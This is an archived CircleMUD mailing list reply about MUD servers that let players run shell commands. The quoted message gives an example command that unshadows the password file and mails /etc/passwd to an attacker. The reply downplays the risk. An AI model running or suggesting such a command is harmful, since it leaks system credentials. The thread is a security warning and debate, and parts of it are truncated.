Re: Ports

From: Shane Lee (
Date: 09/08/00

---- Begin Original Message ----

From: The Merciless Lord of Everything <>
Sent: Fri, 8 Sep 2000 12:25:30 +0200
Subject: Re: [CIRCLE] Ports

While I'm on the ranting side :), a mud should imho not be able to
onto system files. I've seen muds offer "ps -axu" and return the
information to the user, even muds that offer the ability to execute
arbitrary commands on the server. Imagine the following in conjunciton
with a mud that runs as root (and offers the above arbitrary)

Mr. Evilguy hacks the admins passwords (grabs it or however Evilguys
it :), and does a
"execute pwunconv && mail < /etc/passwd && pwconv"
Voila.. mr evilguy now has a complete listing of usernames and



Sir Alec Guinness
 - May the force be with you, Always!


Hrmm, I beg to differ with you here. I installed pgrun.c written by
Petr Vilim and have found it very useful. After contacting Petr, I
installed a "make" command that allows me to compile the MUD without
having to enter the shell. When you edit the source via save-to-ftp,
you find this more than a bit handy.
Security is not that hard, as long as you protect each command with a
final argument that contains a password. Of course, you want to check
the player's idnum first.
If a hacker is out to get you, there isn't much you can do. I refuse
to stay hudled up in a corner, cowering in fright while life passes
me by.


Get your Free E-mail at
Get your own Web-Based E-mail Service at

     | Ensure that you have read the CircleMUD Mailing List FAQ:  |
     |  |

This archive was generated by hypermail 2b30 : 04/11/01 PDT